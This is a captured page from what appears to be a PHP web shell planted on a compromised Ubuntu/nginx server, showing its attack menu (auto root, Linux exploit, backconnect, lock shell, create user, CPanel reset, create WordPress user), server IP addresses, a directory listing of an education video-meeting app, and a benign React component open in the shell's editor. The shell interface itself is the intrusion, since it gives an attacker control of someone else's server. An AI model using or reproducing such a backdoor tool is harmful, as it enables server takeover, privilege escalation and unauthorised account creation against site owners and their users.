Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
edusewa /
components /
[ HOME SHELL ]
Name
Size
Permission
Action
AccessControl
[ DIR ]
drwxr-xr-x
Containers
[ DIR ]
drwxr-xr-x
Controls
[ DIR ]
drwxr-xr-x
MeetingDrawer
[ DIR ]
drwxr-xr-x
MeetingViews
[ DIR ]
drwxr-xr-x
Notifications
[ DIR ]
drwxr-xr-x
PeerAudio
[ DIR ]
drwxr-xr-x
Settings
[ DIR ]
drwxr-xr-x
VideoContainers
[ DIR ]
drwxr-xr-x
VideoWindow
[ DIR ]
drwxr-xr-x
App.js
977
B
-rw-r--r--
ChooseRoom.js
4.42
KB
-rw-r--r--
FullScreen.js
2.17
KB
-rw-r--r--
JoinDialog.js
11.1
KB
-rw-r--r--
LoadingView.css
48
B
-rw-r--r--
LoadingView.js
165
B
-rw-r--r--
ReactLazyPreload.js
192
B
-rw-r--r--
Room.js
8.76
KB
-rw-r--r--
Selectors.js
8.15
KB
-rw-r--r--
UnsupportedBrowser.js
3.9
KB
-rw-r--r--
appPropTypes.js
2.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ChooseRoom.js
import React, { useState } from 'react'; import { Link } from 'react-router-dom'; import { withStyles } from '@material-ui/core/styles'; import isElectron from 'is-electron'; import PropTypes from 'prop-types'; import { useIntl, FormattedMessage } from 'react-intl'; import randomString from 'random-string'; import Dialog from '@material-ui/core/Dialog'; import DialogContentText from '@material-ui/core/DialogContentText'; import Typography from '@material-ui/core/Typography'; import Button from '@material-ui/core/Button'; import TextField from '@material-ui/core/TextField'; import CookieConsent from 'react-cookie-consent'; import MuiDialogTitle from '@material-ui/core/DialogTitle'; import MuiDialogContent from '@material-ui/core/DialogContent'; import MuiDialogActions from '@material-ui/core/DialogActions'; const styles = (theme) => ({ root : { display : 'flex', width : '100%', height : '100%', backgroundColor : 'var(--background-color)', backgroundImage : `url(${window.config ? window.config.background : null})`, backgroundAttachment : 'fixed', backgroundPosition : 'center', backgroundSize : 'cover', backgroundRepeat : 'no-repeat' }, dialogTitle : { }, dialogPaper : { width : '30vw', padding : theme.spacing(2), [theme.breakpoints.down('lg')] : { width : '40vw' }, [theme.breakpoints.down('md')] : { width : '50vw' }, [theme.breakpoints.down('sm')] : { width : '70vw' }, [theme.breakpoints.down('xs')] : { width : '90vw' } }, logo : { display : 'block', paddingBottom : '1vh' }, loginButton : { position : 'absolute', right : theme.spacing(2), top : theme.spacing(2), padding : 0 }, largeIcon : { fontSize : '2em' }, largeAvatar : { width : 50, height : 50 }, green : { color : 'rgba(0, 153, 0, 1)' } }); const DialogTitle = withStyles(styles)((props) => { const { children, classes, ...other } = props; return ( <MuiDialogTitle disableTypography className={classes.dialogTitle} {...other}> { window.config.logo && <img alt='Logo' className={classes.logo} src={window.config.logo} /> } <Typography variant='h5'>{children}</Typography> </MuiDialogTitle> ); }); const DialogContent = withStyles((theme) => ({ root : { padding : theme.spacing(2) } }))(MuiDialogContent); const DialogActions = withStyles((theme) => ({ root : { margin : 0, padding : theme.spacing(1) } }))(MuiDialogActions); const ChooseRoom = ({ classes }) => { const [ roomId, setRoomId ] = useState(randomString({ length: 8 }).toLowerCase()); const intl = useIntl(); return ( <div className={classes.root}> <Dialog open classes={{ paper : classes.dialogPaper }} > <DialogTitle> { window.config.title ? window.config.title : 'edusewa' } <hr /> </DialogTitle> <DialogContent> <DialogContentText gutterBottom> <FormattedMessage id='room.chooseRoom' defaultMessage='Choose the name of the room you would like to join' /> </DialogContentText> <TextField id='roomId' label={intl.formatMessage({ id : 'label.roomName', defaultMessage : 'Room name' })} value={roomId} variant='outlined' margin='normal' onChange={(event) => { const { value } = event.target; setRoomId(value.toLowerCase()); }} onBlur={() => { if (roomId === '') setRoomId(randomString({ length: 8 }).toLowerCase()); }} fullWidth /> </DialogContent> <DialogActions> <Button component={Link} to={roomId} variant='contained' color='secondary' > <FormattedMessage id='label.chooseRoomButton' defaultMessage='Continue' /> </Button> </DialogActions> { !isElectron() && <CookieConsent buttonText={intl.formatMessage({ id : 'room.consentUnderstand', defaultMessage : 'I understand' })} > <FormattedMessage id='room.cookieConsent' defaultMessage='This website uses cookies to enhance the user experience' /> </CookieConsent> } </Dialog> </div> ); }; ChooseRoom.propTypes = { classes : PropTypes.object.isRequired }; export default withStyles(styles)(ChooseRoom);
Close